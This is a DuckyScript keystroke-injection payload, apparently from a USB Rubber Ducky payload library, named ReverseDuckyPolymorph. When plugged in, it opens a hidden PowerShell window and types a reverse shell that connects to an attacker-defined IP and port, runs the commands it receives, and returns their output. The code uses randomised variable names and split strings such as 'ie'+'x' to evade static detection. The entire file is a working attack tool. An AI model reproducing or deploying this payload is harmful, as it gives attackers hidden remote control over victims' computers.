Path: blob/master/payloads/library/remote_access/ReverseDuckyPolymorph/payload.txt
2968 views
REM Title: ReverseDuckyPolymorph1REM Author: 0i41E, Korben2REM Version 1.134REM Target: Windows / Linux(?) (Not tested with Powershell on Linux)5REM Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum67REM Description:8REM TCP Reverse shell executed hidden in the background,9REM the CAPSLOCK light at the end will indicate that the payload was executed.10REM Because of randomisation static detection will be impeded11REM DON'T FORGET TO START LISTENER BEFORE DEPLOYING ON TARGET1213REM REQUIRED: Define the attackers IP & Port14DEFINE ADDRESS '0.0.0.0'15DEFINE PORT 44441617REM Extension DETECT_READY by Korben for best and fastest deployment18EXTENSION DETECT_READY19REM VERSION 1.02021REM USAGE:22REM Extension runs inline (here)23REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic24REM boot delay2526REM TARGETS:27REM Any system that reflects CAPSLOCK will detect minimum required delay28REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms2930REM CONFIGURATION:31DEFINE RESPONSE_DELAY 2532DEFINE ITERATION_LIMIT 1203334VAR $C = 035WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))36CAPSLOCK37DELAY RESPONSE_DELAY38$C = ($C + 1)39END_WHILE40CAPSLOCK41END_EXTENSION4243REM Variables for pseudo random variables44VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE45VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE46VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE47VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE48VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE49VAR $var_duckID = $_RANDOM_UPPER_LETTER_KEYCODE50VAR $var_duckID2 = $_RANDOM_NUMBER_KEYCODE51VAR $var_duckID3 = $_RANDOM_NUMBER_KEYCODE5253DELAY 150054GUI r55DELAY 50056STRINGLN powershell -NoP -NonI -w h57DELAY 50058STRING $59INJECT_VAR $var_gibberish60INJECT_VAR $var_gibberish261INJECT_VAR $var_gibberish362INJECT_VAR $var_gibberish463STRING =[TyPE]('tExT'+'.enCOD'+'InG');$64INJECT_VAR $var_gibb3rish65REM Address and Port of the listening machine66STRING =.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$67INJECT_VAR $var_gibberish468STRING =$69INJECT_VAR $var_gibb3rish70STRING .GetStream();[byte[]]$b=0..65535|&('%'){0};while(($71INJECT_VAR $var_gibberish472INJECT_VAR $var_gibberish373INJECT_VAR $var_gibberish74INJECT_VAR $var_duckID375STRING =$76INJECT_VAR $var_gibberish477STRING .Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$78INJECT_VAR $var_gibberish479INJECT_VAR $var_gibberish380INJECT_VAR $var_gibberish81INJECT_VAR $var_duckID382STRING );$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky_83INJECT_VAR $var_duckID84INJECT_VAR $var_duckID285INJECT_VAR $var_duckID386STRING @PS '+(&('g'+'l'))+'> ';$87INJECT_VAR $var_duckID388INJECT_VAR $var_gibberish289INJECT_VAR $var_gibb3rish90STRING =($91INJECT_VAR $var_gibberish92INJECT_VAR $var_gibberish293INJECT_VAR $var_gibberish394INJECT_VAR $var_gibberish495STRING ::ASCII).GetBytes($Z);$96INJECT_VAR $var_gibberish497STRING .Write($98INJECT_VAR $var_duckID399INJECT_VAR $var_gibberish2100INJECT_VAR $var_gibb3rish101STRING ,0,$102INJECT_VAR $var_duckID3103INJECT_VAR $var_gibberish2104INJECT_VAR $var_gibb3rish105STRING .Length);$106INJECT_VAR $var_gibberish4107STRING .Flush()};$108INJECT_VAR $var_gibb3rish109STRINGLN .Close();exit110DELAY 100111CAPSLOCK112113114